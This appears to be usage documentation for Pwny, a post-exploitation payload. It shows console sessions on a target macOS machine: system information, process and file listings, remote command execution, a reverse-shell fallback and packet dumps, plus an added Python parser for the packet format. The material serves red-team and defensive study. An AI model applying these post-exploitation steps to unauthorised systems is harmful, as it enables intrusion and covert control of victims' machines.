Pwny is equipped with a powerful console that provides an extensive interface for interacting with the payload. The console differs between systems because different systems support different commands and plugins. To list the available commands, type help.

Pwny interactive shell v1.0.0
Running as felix on /Users/felix

pwny:/Users/felix felix$ help

Core Commands:

    Command    Description
    -------    -----------
    clear      Clear terminal window.
    env        List environment variables.
    exec       Execute path.
    exit       Exit Pwny and terminate connection.
    help       Show all available commands.
    load       Load plugin by name.
    plugins    Show available plugins.
    prompt     Set current prompt line.
    quit       Exit console.
    set        Set environment variable.
    unload     Unload plugin by name.
    unset      Delete environment variable.

... snip ...

Information gathering

The most basic thing you can do with Pwny is collect information about the system and the hardware it is running on. The sysinfo command displays it in a neofetch-like format.

pwny:/Users/felix felix$ sysinfo

         .:'          Name: macOS
     __ :'__        Kernel: 11.7.3
  .'`  `-'  ``.       Time: 2024-05-03 22:33:51 IST (UTC+0100)
 :          .-'     Vendor: Apple
 :         :          Arch: arm64
  :         `-;     Memory: 14.23 GB/16.0 GB
   `.__.-.__.'        UUID: 7b22d2ad-8b8d-496c-b163-f265f35253e1

pwny:/Users/felix felix$ 

Encrypted negotiation

It’s up to you to decide whether to communicate with the target device without encryption. However, it is worth mentioning that in the absence of encryption, all commands can be viewed through network analyzers (like Wireshark).

You can establish or re-establish secure communication manually using the secure command, or disable it at any time by typing unsecure.

pwny:/Users/felix felix$ secure
[*] Generating RSA keys...
[*] Exchanging RSA keys for TLS...
[+] RSA keys exchange success!
[+] Communication secured with TLS! 

Pretty output

If there is a large amount of data to print, the Pwny console displays it in a less-like pager so that all the data fits:

pwny:/Users/felix felix$ ps

Process List:

    PID      CPU      Name                Path
    ---      ---      ----                ----
    1        arm64    launchd
    73       arm64    syslogd
    74       arm64    UserEventAgent
    76       arm64    uninstalld
    77       arm64    fseventsd
    79       arm64    mediaremoted
    84       arm64    systemstats
    86       arm64    configd
    87       arm64    endpointsecurity
Press Enter for more, or 'q' to quit:

Auto-completion

The Pwny console supports auto-completion. If you type li instead of list, it will complete it for you.

pwny:/Users/felix felix$ li

Listing: .:

    Mode         Size         Type         Modified               Name
    ----         ----         ----         --------               ----
    r--------    7.00 B       file         2023-01-28 15:19:51    .CFUserTextEncoding
    rw-------    1.16 KB      file         2024-02-06 01:18:13    .sqlite_history
    rw-------    12.00 B      file         2024-02-24 15:04:39    important.txt

However, if you misspell a command and auto-completion cannot select the appropriate command, the console suggests similar commands.

pwny:/Users/felix felix$ ca
[!] Did you mean? cam, cat
[-] Failed to spawn process for ca!
[-] Unrecognized command: ca!

Binaries

The Pwny console supports execution of system-wide binaries (i.e. binaries in PATH), as shown below.

pwny:/Users/felix felix$ ls /
Applications
Library
System
Users
Volumes
bin
cores
dev
etc
home
opt
private
sbin
tmp
usr
var

Shell fallback

Want to go back to a basic reverse shell? Not a problem, Pwny allows you to drop into a basic shell.

pwny:/Users/felix felix$ bash
pwd
/Users/felix
whoami
felix
exit

Shortcuts

Type a path straight into the Pwny console and it will decide what to do: change to the path if it’s a directory, or execute it if it’s an executable.

pwny:/Users/felix felix$ /bin/df
Filesystem     512-blocks      Used Available Capacity iused      ifree %iused  Mounted on
/dev/disk3s3s1  965595304  40074232 168331776    20%  553779 4827422741    0%   /
pwny:/Users/felix felix$ /
pwny:/ felix$ pwd
/

Prepending ! to a command executes it locally as a shell command.

Environment

The Pwny console has its own environment, so setting certain environment variables may affect some features. You can list all environment variables with the env command.

pwny:/ felix$ env

Environment Variables:

    Name    Value
    ----    -----
    PATH    /opt/homebrew/sbin:/opt/homebrew/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Verbose mode

If you want to see all the packets that are sent and received, enable the VERBOSE variable.

pwny:/ felix$ set verbose on
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  db 59 00 00             |.........Y..    |
[i] Read TLV packet (21 bytes, 2 objects)
[i] 00000000  e3 2e 00 00 01 00 00 00  2f ba 0b 00 00 04 00 00 |......../.......|
[i] 00000010  00 01 00 00 00                                   |.....           |
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  0f 52 00 00             |.........R..    |
[i] Read TLV packet (25 bytes, 2 objects)
[i] 00000000  0c 00 00 00 05 00 00 00  66 65 6c 69 78 ba 0b 00 |........felix...|
[i] 00000010  00 04 00 00 00 01 00 00  00                      |.........       |
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  0f 52 00 00             |.........R..    |
[i] Read TLV packet (25 bytes, 2 objects)
[i] 00000000  0c 00 00 00 05 00 00 00  66 65 6c 69 78 ba 0b 00 |........felix...|
[i] 00000010  00 04 00 00 00 01 00 00  00                      |.........       |
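
The byte counts and object counts in the dump above fit a simple layout: each object is a 4-byte little-endian type, a 4-byte little-endian length, then the value. The parser below is an added example (not Pwny's own code) that decodes the packets from the dump under that inferred layout, as an analyst reading an unencrypted capture would; the function names and the rendering of values are assumptions.

```python
import struct

# Constructed input: packet bytes copied from the verbose dump above.
SENT = bytes.fromhex("b90b0000 04000000 db590000")
READ_1 = bytes.fromhex("e32e0000 01000000 2f ba0b0000 04000000 01000000")
READ_2 = bytes.fromhex("0c000000 05000000 66656c6978 ba0b0000 04000000 01000000")

# Assumed layout, inferred from the dump: u32 type, u32 length, little-endian.
HEADER = struct.Struct("<II")


class TLVError(ValueError):
    """Raised when a buffer does not split cleanly into TLV objects."""


def parse_tlv(packet: bytes, max_len: int = 1 << 20):
    """Split a packet into (type, value) pairs, rejecting malformed input."""
    objects, offset = [], 0
    while offset < len(packet):
        if len(packet) - offset < HEADER.size:
            raise TLVError(f"truncated header at offset {offset}")
        tag, length = HEADER.unpack_from(packet, offset)
        offset += HEADER.size
        left = len(packet) - offset
        if length > max_len or length > left:
            raise TLVError(f"type {tag} claims {length} bytes, {left} available")
        objects.append((tag, packet[offset:offset + length]))
        offset += length
    return objects


def describe(value: bytes):
    """Heuristic rendering: 4-byte values as u32, printable bytes as text, else hex."""
    if len(value) == 4:
        return struct.unpack("<I", value)[0]
    if value and all(32 <= b < 127 for b in value):
        return value.decode("ascii")
    return value.hex()


if __name__ == "__main__":
    for name, pkt in (("sent", SENT), ("read", READ_1), ("read", READ_2)):
        fields = [(t, describe(v)) for t, v in parse_tlv(pkt)]
        print(f"{name} {len(pkt)} bytes, {len(fields)} objects: {fields}")
```

The decoded values (a path separator, the username felix) show what is readable on the wire when the channel is left unencrypted.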